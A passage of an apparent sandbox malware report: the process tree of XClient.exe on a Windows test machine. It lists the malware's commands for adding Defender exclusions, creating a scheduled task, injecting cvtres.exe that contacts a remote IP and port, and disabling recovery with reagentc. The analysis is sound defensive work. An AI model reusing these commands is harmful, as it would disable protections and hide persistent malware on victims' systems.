  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:1012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
  2⤵
  PID:388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5188 /prefetch:8
  2⤵
  PID:3952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  PID:5592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1968
- C:\Users\Admin\Downloads\XClient.exe
  "C:\Users\Admin\Downloads\XClient.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:3740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1836
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:6036
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 193.161.193.99 35748 1999 71A443949F3123150C08
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1468
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1220
    - - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2304
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:5136
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff994db3cb8,0x7ff994db3cc8,0x7ff994db3cd8
        5⤵
        
        PID:3952
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1884 /prefetch:2
        5⤵
        
        PID:2056
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2092 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5544
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2744 /prefetch:8
        5⤵
        
        PID:5168
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
        5⤵
        
        PID:2016
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
        5⤵
        
        PID:1360
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1872 /prefetch:2
        5⤵
        
        PID:4952
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2264 /prefetch:2
        5⤵
        
        PID:1660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
        5⤵
        
        PID:3156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
        5⤵
        
        PID:3492
    - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3544 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1692
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
        5⤵
        
        PID:2512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
        5⤵
        
        PID:2872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=5264 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:1
        5⤵
        
        PID:1572
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
        5⤵
        
        PID:6060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
        5⤵
        
        PID:2824
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
        5⤵
        
        PID:5204
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
        5⤵
        
        PID:5916
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
        5⤵
        
        PID:6124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
        5⤵
        
        PID:4312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
        5⤵
        
        PID:800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
        5⤵
        
        PID:6020
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=5780 /prefetch:8
        5⤵
        
        PID:5904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=5704 /prefetch:8
        5⤵
        
        PID:5200
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,9290844689068013584,6611172717737615003,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
        5⤵
        
        PID:4688
- - C:\Windows\SYSTEM32\CMD.EXE
    "CMD.EXE"
    3⤵
    PID:5000
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:2308

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5600

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3264

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5192

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:2276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff97ca5cc40,0x7ff97ca5cc4c,0x7ff97ca5cc58
  2⤵
  PID:4128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1720,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1712 /prefetch:2
  2⤵
  PID:5796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2044,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2124 /prefetch:3
  2⤵
  PID:1480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:8
  2⤵
  PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:3472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:5364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3548,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4488 /prefetch:1
  2⤵
  PID:4380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4912,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4944 /prefetch:8
  2⤵
  PID:6016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:8
  2⤵
  PID:220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4940 /prefetch:8
  2⤵
  PID:4856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4612,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4988 /prefetch:8
  2⤵
  PID:6036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4296,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3552 /prefetch:8
  2⤵
  PID:5936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5088,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5004 /prefetch:8
  2⤵
  PID:5744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4272,i,13425045351418168420,454547261423351870,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:2
  2⤵
  PID:2376

